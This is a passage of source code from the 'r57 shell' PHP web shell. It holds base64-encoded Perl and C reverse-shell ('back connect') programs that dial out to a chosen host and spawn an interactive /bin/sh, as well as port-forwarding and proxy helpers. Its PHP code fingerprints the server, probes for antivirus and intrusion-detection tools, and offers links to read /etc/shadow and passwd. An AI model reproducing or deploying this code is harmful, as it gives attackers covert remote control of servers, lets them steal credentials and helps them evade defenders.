1116Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1117lIENPTk47DQpleGl0IDA7DQp9DQp9";
1118 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1119aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1120hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1121sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1122kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1123KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1124OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1125 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1126BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1127SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1128KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1129sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1130Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1131QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1132Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1133 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1134x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1135HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1136aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1137lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1138xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1139W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1140LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1141udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
11420KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1143iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1144KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1145gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1146hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1147iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1148ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1149vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1150AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1151QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1152ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1153gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1154wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
115529jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1156MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1157gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
11585zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1159HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1160dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1161KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1162ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1163E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1164Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1165NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1166J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1167CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1168dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1169gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1170lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1171 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1172CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1173bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1174gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1175NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1176iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1177aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1178SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1179xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1180WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1181CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1182yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1183I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1184m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1185IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1186lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1187QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1188CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1189c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1190NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1191UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1192DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1193ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
11941ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1195 $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
1196luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
11970NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
1198UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
1199DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
1200AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
1201GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
1202cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
1203BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
1204AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
1205TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
1206eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
1207oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
1208VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
1209CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
1210b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
12110ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
12129wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
1213CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
1214aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
1215gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
12169yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
1217 if($unix) { if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');
1218setcookie('uname',$uname);
1219}else {$uname = $_COOKIE['uname'];
1220} if(!isset($_COOKIE['id'])) {$id = ex('id');
1221setcookie('id',$id);
1222}else {$id = $_COOKIE['id'];
1223} if($safe_mode) {$sysctl = '-';
1224} else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];
1225} else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1226 if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');
1227} if(empty($sysctl)) {$sysctl = '-';
1228} setcookie('sysctl',$sysctl);
1229 } } echo $head;
1230 echo '</head>';
1231 echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(2).'<font face=tahoma size=2><b>r57 shell '.$version.'</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
1232 echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
1233 if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";
1234} if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";
1235} echo " Server IP: [<a href=".gethostbyname($_SERVER["HTTP_HOST"])." target=iframe><font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font></a>]";
1236 echo "<br>";
1237 echo ws(2)."PHP version: <b>".@phpversion()."</b>";
1238 $curl_on = @function_exists('curl_version');
1239 echo ws(2);
1240 echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
1241 echo "</b>".ws(2);
1242 echo "MySQL: <b>";
1243 $mysql_on = @function_exists('mysql_connect');
1244 if($mysql_on){ echo "<font color=green>ON</font>";
1245}else {echo "<font color=red>Kapali</font>";
1246} echo "</b>".ws(2);
1247 echo "MSSQL: <b>";
1248 $mssql_on = @function_exists('mssql_connect');
1249 if($mssql_on){echo "<font color=green>ON</font>";
1250}else{echo "<font color=red>Kapali</font>";
1251} echo "</b>".ws(2);
1252 echo "PostgreSQL: <b>";
1253 $pg_on = @function_exists('pg_connect');
1254 if($pg_on){echo "<font color=green>ON</font>";
1255}else{echo "<font color=red>Kapali</font>";
1256} echo "</b>".ws(2);
1257 echo "Oracle: <b>";
1258 $ora_on = @function_exists('ocilogon');
1259 if($ora_on){echo "<font color=green>ON</font>";
1260}else{echo "<font color=red>Kapali</font>";
1261} echo "</b><br>".ws(2);
1262 echo "Safe_mode: <b>";
1263 echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
1264 echo "</b>".ws(2);
1265 echo "Open_basedir: <b>";
1266 if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";
1267}else {echo "<font color=green>$df</font></b>";
1268};
1269} else {echo "<font color=red>NONE</font></b>";
1270} echo ws(2)."Safe_mode_exec_dir: <b>";
1271 if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";
1272}else {echo "<font color=green>$df</font></b>";
1273};
1274} else {echo "<font color=red>ini_get disable!</font></b>";
1275} echo ws(2)."Safe_mode_include_dir: <b>";
1276 if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";
1277}else {echo "<font color=green>$df</font></b>";
1278};
1279} else {echo "<font color=red>ini_get disable!</font></b>";
1280} echo "<br>".ws(2);
1281 echo "Disable functions : <b>";
1282$df='ini_get disable!';
1283 if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";
1284}else{echo "<font color=red>$df</font></b>";
1285} $free = @diskfreespace($dir);
1286 if (!$free) {$free = 0;
1287} $all = @disk_total_space($dir);
1288 if (!$all) {$all = 0;
1289} echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1290 $ust='';
1291 if($unix &&!$safe_mode){ if (which('gcc')) {$ust.="gcc,";
1292} if (which('cc')) {$ust.="cc,";
1293} if (which('ld')) {$ust.="ld,";
1294} if (which('php')) {$ust.="php,";
1295} if (which('perl')) {$ust.="perl,";
1296} if (which('python')) {$ust.="python,";
1297} if (which('ruby')) {$ust.="ruby,";
1298} if (which('make')) {$ust.="make,";
1299} if (which('tar')) {$ust.="tar,";
1300} if (which('nc')) {$ust.="netcat,";
1301} if (which('locate')) {$ust.="locate,";
1302} if (which('suidperl')) {$ust.="suidperl,";
1303} } if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";
1304} if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";
1305} $ust='';
1306 if($unix &&!$safe_mode){ if (which('kav')) {$ust.="kav,";
1307} if (which('nod32')) {$ust.="nod32,";
1308} if (which('bdcored')) {$ust.="bitdefender,";
1309} if (which('uvscan')) {$ust.="mcafee,";
1310} if (which('sav')) {$ust.="symantec,";
1311} if (which('drwebd')) {$ust="drwebd,";
1312} if (which('clamd')) {$ust.="clamd,";
1313} if (which('rkhunter')) {$ust.="rkhunter,";
1314} if (which('chkrootkit')) {$ust.="chkrootkit,";
1315} if (which('iptables')) {$ust.="iptables,";
1316} if (which('ipfw')) {$ust.="ipfw,";
1317} if (which('tripwire')) {$ust.="tripwire,";
1318} if (which('shieldcc')) {$ust.="stackshield,";
1319} if (which('portsentry')) {$ust.="portsentry,";
1320} if (which('snort')) {$ust.="snort,";
1321} if (which('ossec')) {$ust.="ossec,";
1322} if (which('lidsadm')) {$ust.="lidsadm,";
1323} if (which('tcplodg')) {$ust.="tcplodg,";
1324} if (which('tripwire')) {$ust.="tripwire,";
1325} if (which('sxid')) {$ust.="sxid,";
1326} if (which('logcheck')) {$ust.="logcheck,";
1327} if (which('logwatch')) {$ust.="logwatch,";
1328} } if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";
1329} if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";
1330} echo "<br>".ws(2)."</b>";
1331 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1332 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1333 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1334 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1335 if(!$unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
1336 }else{ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
1337 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
1338 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
1339 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
1340 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
